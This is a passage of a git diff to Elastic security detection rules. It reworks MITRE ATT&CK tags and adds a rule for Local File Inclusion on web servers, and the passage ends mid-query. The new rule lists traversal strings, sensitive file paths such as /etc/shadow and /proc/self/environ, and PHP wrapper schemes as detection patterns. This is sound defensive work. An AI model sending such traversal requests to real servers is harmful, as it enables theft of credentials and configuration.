[rule] author = ["Elastic"] @@ -113,34 +113,22 @@ event.category:network and host.os.type:macos and event.action:connection_attemp [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0072" -name = "Reverse Shell" -reference = "https://atlas.mitre.org/techniques/AML.T0072/" - -[rule.threat.tactic] -id = "AML.TA0014" -name = "Command and Control" -reference = "https://atlas.mitre.org/tactics/AML.TA0014/" [rule.new_terms] field = "new_terms_fields" value = ["destination.domain"] diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml index 843b580ae3b..0ca53756373 100644 --- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["endpoint", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/20" [rule] author = ["Elastic"] @@ -73,3 +73,10 @@ note = """## Triage and analysis - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. """ +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml index 20b9041be9c..6a3c887e279 100644 --- a/rules/cross-platform/command_and_control_tunnel_qemu.toml +++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -95,13 +95,14 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1219" +name = "Remote Access Tools" +reference = "https://attack.mitre.org/techniques/T1219/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml index cce002926ea..70427bd61ba 100644 --- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml +++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -57,7 +57,21 @@ references = [ risk_score = 73 rule_id = "c0136397-f82a-45e5-9b9f-a3651d77e21a" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0085", "Mitre Atlas: T0085.001", "Mitre Atlas: T0055"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0085", + "Mitre Atlas: T0085.001", + "Mitre Atlas: T0055", +] timestamp_override = "event.ingested" type = "eql" @@ -125,51 +139,26 @@ file where event.action in ("open", "creation", "modification") and event.outcom [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" -[[rule.threat.technique.subtechnique]] -id = "T1555.001" -name = "Keychain" -reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1555.003" -name = "Credentials from Web Browsers" -reference = "https://attack.mitre.org/techniques/T1555/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml index 85e8dd9bffd..f4efcf94595 100644 --- a/rules/cross-platform/credential_access_gitleaks_execution.toml +++ b/rules/cross-platform/credential_access_gitleaks_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/28" [rule] author = ["Elastic"] @@ -99,14 +99,14 @@ process.name : ("gitleaks.exe", "gitleaks") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml index 358ef937467..b6faa0d1aee 100644 --- a/rules/cross-platform/credential_access_trufflehog_execution.toml +++ b/rules/cross-platform/credential_access_trufflehog_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/26" [rule] author = ["Elastic"] @@ -101,14 +101,14 @@ process.args == "--json" and process.args == "filesystem" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml index 408663c99c1..150a6573e2d 100644 --- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml +++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -86,18 +86,14 @@ file where event.type == "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" -[[rule.threat.technique.subtechnique]] -id = "T1070.004" -name = "File Deletion" -reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml index 633392510ce..a33eb01577e 100644 --- a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml +++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/17" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -81,23 +81,22 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py [[rule.threat]] framework = "MITRE ATT&CK" - +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" - [[rule.threat.technique.subtechnique]] id = "T1027.013" name = "Encrypted/Encoded File" reference = "https://attack.mitre.org/techniques/T1027/013/" -[[rule.threat.technique]] -id = "T1140" -name = "Deobfuscate/Decode Files or Information" -reference = "https://attack.mitre.org/techniques/T1140/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml index a7df32f5e59..812702a98d9 100644 --- a/rules/cross-platform/defense_evasion_genai_config_modification.toml +++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -56,7 +56,17 @@ references = [ risk_score = 47 rule_id = "590fc62d-7386-4c75-92b0-af4517018da1" severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", +] timestamp_override = "event.ingested" type = "new_terms" @@ -94,21 +104,29 @@ file.path : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml index 7a5756a489d..20e0c1c6df0 100644 --- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml +++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/04" [rule] author = ["Elastic"] @@ -58,7 +58,23 @@ references = [ risk_score = 47 rule_id = "b2c3d4e5-f6a7-8901-bcde-f123456789ab" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Resource Development", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Auditd Manager", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0053"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Auditd Manager", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0053", +] timestamp_override = "event.ingested" type = "eql" @@ -124,18 +140,19 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1587" -name = "Develop Capabilities" -reference = "https://attack.mitre.org/techniques/T1587/" - +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" [[rule.threat.technique.subtechnique]] -id = "T1587.001" -name = "Malware" -reference = "https://attack.mitre.org/techniques/T1587/001/" +id = "T1027.004" +name = "Compile After Delivery" +reference = "https://attack.mitre.org/techniques/T1027/004/" + + [rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml index ec1658731b2..1f8053d9767 100644 --- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml +++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/04" [rule] author = ["Elastic"] @@ -60,7 +60,22 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-9012-cdef-123456789abc" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0086"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Exfiltration", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0086", +] timestamp_override = "event.ingested" type = "eql" @@ -144,39 +159,14 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1020" -name = "Automated Exfiltration" -reference = "https://attack.mitre.org/techniques/T1020/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml index a7a04ddf251..4b53205e011 100644 --- a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml +++ b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/09" [rule] author = ["Elastic"] @@ -58,7 +58,15 @@ references = ["https://attack.mitre.org/techniques/T1562/001/"] risk_score = 73 rule_id = "fc552f49-8f1c-409b-90f8-6f5b9869b6c4" severity = "high" -tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,18 +78,38 @@ sequence by host.id with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml index 74cb039c6db..31b65ceebca 100644 --- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml +++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/30" integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/09" [rule] author = ["Elastic"] @@ -71,7 +71,16 @@ mean time to respond (MTTR). risk_score = 47 rule_id = "5a876e0d-d39a-49b9-8ad8-19c9b622203b" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "esql" @@ -87,18 +96,35 @@ FROM logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml index 4d1929a052b..c6e250f6b81 100644 --- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml +++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -34,7 +34,15 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -81,36 +89,14 @@ Virtual machine fingerprinting involves identifying virtualized environments by [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml new file mode 100644 index 00000000000..2f85b8138b9 --- /dev/null +++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml @@ -0,0 +1,174 @@ +[metadata] +creation_date = "2025/12/02" +integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] +maturity = "production" +min_stack_version = "9.2.0" +min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0" +updated_date = "2026/03/19" + +[rule] +author = ["Elastic"] +description = """ +This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that +attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may +exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server. +""" +from = "now-11m" +interval = "10m" +language = "esql" +license = "Elastic License v2" +name = "Web Server Local File Inclusion Activity" +note = """ ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + +### Investigating Web Server Local File Inclusion Activity + +This rule surfaces successful GET requests containing directory traversal or direct access to sensitive paths, signaling Local File Inclusion exploitation that can expose credentials, configuration, and process context and enable further compromise. A common attacker pattern is abusing a vulnerable parameter to fetch ../../../../etc/passwd, then pivoting to /proc/self/environ to harvest secrets and identify execution context for subsequent steps. + +### Possible investigation steps + +- Retrieve contiguous access logs around the alert to rebuild each request/response pair (URI, parameters, user agent, referer, cookies, X-Forwarded-For) and identify which parameter reflected traversal or wrapper usage and whether the response likely contained file contents. +- Compare response sizes and content-types for the suspicious requests to normal pages and look for signatures such as "root:x:" lines, INI/XML keys, or base64 blobs that indicate disclosure of /etc/passwd, web.config/applicationhost.config, or other sensitive files. +- Review web server and application error logs at the same timestamps for include/open stream warnings, open_basedir or allow_url_fopen messages, and stack traces to confirm the code path handling the input and any mitigations in place. +- Pivot on the same source and timeframe to find adjacent probes (php://filter, data://, expect://, zip://, phar://, /proc/self/environ, traversal into webroots/configs) and any follow-on POSTs to upload endpoints or new script paths, signaling progression toward RCE or webshell placement. +- Determine whether the traffic was authenticated and whether it traversed a WAF or reverse proxy by correlating cookies or session IDs and client IPs with proxy/WAF logs, noting any blocks, rule matches, or bypasses to bound scope and urgency. + +### False positive analysis + +- A site search or documentation endpoint echoing user-supplied text can include strings like ../../../../etc/passwd, windows/win.ini, or php://filter in the query string and return a normal 200 OK results page rather than performing a file include. +- An authenticated admin feature (such as a log viewer or file browser) may legitimately accept path= or file= parameters referencing local paths like /var/log/nginx or /inetpub/logs/logfiles and return 200 when serving allowed files, producing URLs that match the rule without exploitation. + +### Response and remediation + +- Immediately block the source IP at the reverse proxy/WAF and deploy deny rules for GET requests using ../../ or ..\\..\\ traversal or wrappers (php://, expect://, data://) that fetch /etc/passwd, /proc/self/environ, wp-config.php, web.config, or applicationhost.config. +- Configure the web server to return 403 for paths resolving to /proc, /etc, /var/log, /inetpub, applicationhost.config, and web.config and to reject wrapper schemes like php:// and expect://, then reload Nginx/Apache/IIS to apply. +- Fix the vulnerable include logic by canonicalizing input with realpath, rejecting any .. segments or absolute paths, enforcing a whitelist of allowed files, and in PHP disabling allow_url_include/allow_url_fopen and setting open_basedir to a safe directory. +- Rotate exposed secrets by changing database and API credentials from wp-config.php, connection strings and machine keys from web.config/applicationhost.config, and any tokens in /proc/self/environ, then invalidate active sessions and cache. +- Escalate to incident leadership and quarantine the host if response bodies contain credential patterns (e.g., "root:x:" from /etc/passwd or XML keys from web.config), if /etc/shadow or windows/system32/config/SAM was requested, or if follow-on POSTs or new .php/.aspx files appear in the webroot. +- Recover by verifying integrity of /var/www and /inetpub/wwwroot, scanning for webshells and unexpected includes, redeploying a known-good build or container image if tampering is found, and adding WAF normalization to double-decode URLs and 403 traversal attempts. +""" +risk_score = 21 +rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9" +severity = "low" +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "esql" +query = ''' +from + logs-nginx.access-*, + logs-apache.access-*, + logs-apache_tomcat.access-*, + logs-iis.access-*, + logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code == 200 and + url.original like "*=*" + +| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) + +| where + /* 1) Relative traversal */ + Esql.url_original_url_decoded_to_lower like "*../../../../*" or // Unix-style traversal + Esql.url_original_url_decoded_to_lower like "*..\\\\..\\\\..\\\\..*" or // Windows-style traversal + // Potential security check bypassing (enforcing multiple dots and shortening the pattern) + Esql.url_original_url_decoded_to_lower like "*..././*" or + Esql.url_original_url_decoded_to_lower like "*...\\*" or + Esql.url_original_url_decoded_to_lower like "*....\\*" or + + /* 2) Linux system identity / basic info */ + Esql.url_original_url_decoded_to_lower like "*etc/passwd*" or + Esql.url_original_url_decoded_to_lower like "*etc/shadow*" or + Esql.url_original_url_decoded_to_lower like "*etc/hosts*" or + Esql.url_original_url_decoded_to_lower like "*etc/os-release*" or + Esql.url_original_url_decoded_to_lower like "*etc/issue*" or + + /* 3) Linux /proc enumeration */ + Esql.url_original_url_decoded_to_lower like "*proc/self/environ*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/cmdline*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/fd*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/exe*" or + + /* 4) Linux webroots, configs & logs */ + Esql.url_original_url_decoded_to_lower like "*var/www*" or // generic webroot + Esql.url_original_url_decoded_to_lower like "*wp-config.php*" or // classic WP config + Esql.url_original_url_decoded_to_lower like "*etc/apache2*" or + Esql.url_original_url_decoded_to_lower like "*etc/httpd*" or + Esql.url_original_url_decoded_to_lower like "*etc/nginx*" or + Esql.url_original_url_decoded_to_lower like "*var/log/apache2*" or + Esql.url_original_url_decoded_to_lower like "*var/log/httpd*" or + Esql.url_original_url_decoded_to_lower like "*var/log/nginx*" or + + /* 5) Windows core files / identity */ + Esql.url_original_url_decoded_to_lower like "*windows/panther/*unattend*" or + Esql.url_original_url_decoded_to_lower like "*windows/debug/netsetup.log*" or + Esql.url_original_url_decoded_to_lower like "*windows/win.ini*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/drivers/etc/hosts*" or + Esql.url_original_url_decoded_to_lower like "*boot.ini*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/config/*" or + Esql.url_original_url_decoded_to_lower like "*windows/repair/sam*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/license.rtf*" or + + /* 6) Windows IIS / .NET configs, webroots & logs */ + Esql.url_original_url_decoded_to_lower like "*/inetpub/wwwroot*" or + 